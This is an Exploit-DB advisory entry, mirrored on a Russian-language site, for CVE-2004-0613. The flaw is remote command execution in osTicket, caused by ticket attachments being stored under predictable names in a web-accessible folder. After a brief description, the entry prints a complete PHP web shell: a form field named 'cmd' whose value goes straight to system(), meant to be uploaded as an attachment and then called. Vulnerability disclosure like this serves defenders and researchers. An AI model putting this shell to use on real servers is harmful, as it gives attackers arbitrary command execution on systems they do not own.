- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24225
- Проверка EDB
-
- Пройдено
- Автор
- GUY PEARCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2004-0613
- Дата публикации
- 2004-06-21
PHP:
source: https://www.securityfocus.com/bid/10586/info
osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location.
<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>- Источник
- www.exploit-db.com
